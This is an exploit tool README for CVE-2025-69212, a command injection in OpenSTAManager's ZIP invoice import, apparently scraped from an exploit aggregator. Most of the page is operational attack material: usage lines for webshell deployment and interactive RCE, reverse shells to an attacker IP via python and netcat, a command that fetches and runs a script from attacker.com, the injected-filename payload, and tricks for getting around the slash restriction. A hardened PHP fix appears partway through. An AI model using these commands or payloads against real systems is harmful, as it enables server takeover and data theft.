## https://sploitus.com/exploit?id=B4B4CA7A-D754-5C31-B526-5E199D0B91D5
# CVE-2025-69212
**OpenSTAManager**
### Vulnerability Check
```bash
# Auto-detect plugin and verify vulnerability
python3 exploit.py -t http://target.com -u admin -p secret --check
# With known module/plugin IDs
python3 exploit.py -t http://target.com -u admin -p secret --check --module-id 14 --plugin-id 23
```
### Webshell Deployment
```bash
# Deploy webshell to default directory (files/)
python3 exploit.py -t http://target.com -u admin -p secret --webshell
# Custom directory and filename
python3 exploit.py -t http://target.com -u admin -p secret --webshell --shell-dir uploads --shell-name .config.php
```
### Interactive RCE
```bash
# Deploy webshell + interactive shell
python3 exploit.py -t http://target.com -u admin -p secret --rce
# With existing webshell from previous run
python3 exploit.py -t http://target.com -u admin -p secret --webshell --rce
```
### Reverse Shell
```bash
# Python reverse shell (default)
python3 exploit.py -t http://target.com -u admin -p secret --reverse-shell 10.10.14.5 4444
# Netcat with mkfifo
python3 exploit.py -t http://target.com -u admin -p secret --reverse-shell 10.10.14.5 4444 --method nc
# Netcat with -e flag
python3 exploit.py -t http://target.com -u admin -p secret --reverse-shell 10.10.14.5 4444 --method nc-e
```
### Blind Command Execution
```bash
# Execute a command (no output returned)
python3 exploit.py -t http://target.com -u admin -p secret --cmd "id"
# Download and execute a payload
python3 exploit.py -t http://target.com -u admin -p secret --cmd "cd tmp && wget http://attacker.com/shell.sh && bash shell.sh"
```
### Network Options
```bash
# Through Burp Suite proxy
python3 exploit.py -t http://target.com -u admin -p secret --webshell --proxy http://127.0.0.1:8080
# With request delay (2 seconds)
python3 exploit.py -t http://target.com -u admin -p secret --check --delay 2
# Skip SSL verification
python3 exploit.py -t https://target.com -u admin -p secret --check -k
```
## Full Option Reference
```
Target:
  -t, --target URL          Target base URL

Authentication:
  -u, --user USER           Username for login
  -p, --password PASS       Password for login
  -c, --cookie VALUE        Existing PHPSESSID value

Actions:
  --check                   Verify if target is vulnerable
  --webshell                Deploy PHP webshell
  --rce                     Interactive shell via webshell
  --reverse-shell LHOST LPORT
                            Reverse shell (LHOST LPORT)
  --cmd COMMAND             Blind command execution

Shell Options:
  --shell-dir DIR           Webshell write directory (default: files)
  --shell-name NAME         Custom webshell filename
  --method METHOD           Reverse shell method: python, nc, nc-e

Plugin Detection:
  --module-id ID            OpenSTAManager module ID
  --plugin-id ID            importFE_ZIP plugin ID

Network:
  --proxy URL               HTTP proxy URL
  -k, --no-ssl-verify       Disable SSL verification
  --delay SECONDS           Delay between requests
```
## Technical Details
### Payload Structure
The exploit crafts a ZIP archive containing a single `.p7m` file with a malicious filename:
```
invoice.p7m";INJECTED_COMMAND;echo ".p7m
```
When OpenSTAManager processes this file, the resulting `exec()` call becomes:
```
openssl smime -verify -noverify -in "invoice.p7m";INJECTED_COMMAND;echo ".p7m" -inform DER -out "..."
```
The shell interprets the semicolons as command separators, executing the injected command between the terminated `openssl` call and the trailing `echo`.
### ZipArchive Filename Constraint
> **Critical:** PHP's `ZipArchive::extractTo()` treats forward slashes (`/`) in filenames as directory separators per the ZIP specification. Any `/` in the malicious filename will cause the archive entry to be split into directories, breaking the exploit payload.
All injected commands must avoid `/` entirely:
| Blocked | Alternative |
|---|---|
| `/etc/passwd` | `cd etc && cat passwd` |
| `/usr/bin/python3` | `python3` (relies on PATH) |
| `/tmp/shell.sh` | `cd tmp && shell.sh` |
| `bash -i >& /dev/tcp/...` | Use python or nc methods instead |
### Reverse Shell Methods
| Method | Payload | Requires |
|---|---|---|
| `python` | `python3 -c "import socket,os,subprocess;..."` | Python 3 on target |
| `nc` | `rm -f .f;mkfifo .f;cat .f\|bash -i 2>&1\|nc HOST PORT > .f` | netcat + mkfifo |
| `nc-e` | `nc HOST PORT -e bash` | netcat with `-e` support |
The `python` method is the default and most reliable since it avoids `/` naturally and Python is commonly available on Linux servers.
### Vulnerable Code Path
```
Upload ZIP via importFE_ZIP plugin
└── actions.php dispatches to plugin handler
    └── ZipArchive::extractTo() extracts files
        └── Iterates .p7m files
            └── XML::decodeP7M($filename)
                └── exec('openssl smime ... -in "'.$filename.'"')
                    └── Shell interprets injected commands
```
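The hardened counterpart to the `exec()` call shown in the Payload Structure and Vulnerable Code Path sections above, as an added example that is not OpenSTAManager's own code (the function names `isSafeP7mEntryName`, `archiveEntriesAreSafe` and `decodeP7mWithoutShell` are hypothetical, and `proc_open()` with an argv array assumes PHP 7.4 or later). It applies an allowlist check to every archive entry name before `ZipArchive::extractTo()` is ever called, and passes the filename to `openssl` as a single argv element so no shell parses it. The vulnerable shape is kept only for contrast.

```php
<?php
// Added example, not OpenSTAManager code. Function names are hypothetical;
// the vulnerable shape mirrors the exec() call quoted in the page's
// "Payload Structure" section.

// Vulnerable shape: the archive entry name is spliced into a shell string,
// so a name like  invoice.p7m";INJECTED_COMMAND;echo ".p7m  closes the
// quotes and /bin/sh runs INJECTED_COMMAND. Shown for contrast only.
function decodeP7mVulnerable(string $filename, string $out): void
{
    exec('openssl smime -verify -noverify -in "' . $filename . '" -inform DER -out "' . $out . '"');
}

// Allowlist for an archive entry name: bare basename, conservative character
// set, no leading dot, .p7m suffix, bounded length. Quotes, ';', '/', '\'
// and whitespace are all outside the class, so the payload above is rejected.
function isSafeP7mEntryName(string $name): bool
{
    return preg_match('/^[A-Za-z0-9_-][A-Za-z0-9._-]{0,199}\.p7m$/', $name) === 1
        && $name === basename($name);
}

// Gate the whole upload before extractTo(): one bad entry rejects the archive.
// $rejected receives the offending names for logging.
function archiveEntriesAreSafe(ZipArchive $zip, array &$rejected = []): bool
{
    $rejected = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = $zip->getNameIndex($i);
        if ($name === false || !isSafeP7mEntryName($name)) {
            $rejected[] = $name === false ? "<index $i>" : $name;
        }
    }
    return $rejected === [];
}

// Hardened decode: re-validate the name, then run openssl through proc_open()
// with an argv array (PHP 7.4+). The binary is exec'd directly with no shell
// in between, so metacharacters in the name are data, not syntax.
function decodeP7mWithoutShell(string $dir, string $filename): string
{
    if (!isSafeP7mEntryName($filename)) {
        throw new InvalidArgumentException('rejected .p7m entry name');
    }
    $in  = $dir . '/' . $filename;
    $out = $dir . '/' . substr($filename, 0, -4) . '.xml';

    $argv = ['openssl', 'smime', '-verify', '-noverify',
             '-in', $in, '-inform', 'DER', '-out', $out];
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($argv, $spec, $pipes, $dir);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start openssl');
    }
    $stdout = stream_get_contents($pipes[1]);
    $stderr = stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    if (proc_close($proc) !== 0) {
        throw new RuntimeException('openssl failed: ' . trim($stderr . $stdout));
    }
    return $out;
}

// Usage: the page's payload name is refused, an ordinary SDI-style name passes.
var_dump(isSafeP7mEntryName('invoice.p7m";INJECTED_COMMAND;echo ".p7m'));
var_dump(isSafeP7mEntryName('IT01234567890_00001.xml.p7m'));

$zip = new ZipArchive();
if ($zip->open($argv_path ?? 'upload.zip') === true) {
    if (!archiveEntriesAreSafe($zip, $bad)) {
        error_log('importFE_ZIP: rejected archive, entries: ' . implode(', ', $bad));
        $zip->close();
        exit(1);
    }
    // Only now is extraction and per-file decoding safe to proceed.
    $zip->close();
}
```

The two checks are deliberately redundant: the archive gate stops the upload before anything touches disk, and the argv-based invocation means that even a name which somehow slipped past validation could not reach a shell. Calling `escapeshellarg()` on the old `exec()` string would also close this specific hole, but removing the shell from the call path is the stronger fix.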
## Attack Chain Example
```
1. --check         → Confirm RCE via marker file
2. --webshell      → Drop PHP shell to files/ directory
3. --rce           → Interactive command execution
4. Enumerate       → id, cat /etc/passwd, ifconfig
5. Pivot           → Reverse shell to attacker, post-exploitation
```
## Disclaimer
This tool is provided for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing. The author assumes no liability for misuse.
## References
- [CVE-2025-69212 (NVD)](https://nvd.nist.gov/vuln/detail/CVE-2025-69212)
- [GitHub Security Advisory: GHSA-25fp-8w8p-mx36](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36)
- [OpenSTAManager Repository](https://github.com/devcode-it/openstamanager)
- [PoC by Lukasz Rybak](https://github.com/lukasz-rybak/CVE-2025-69212)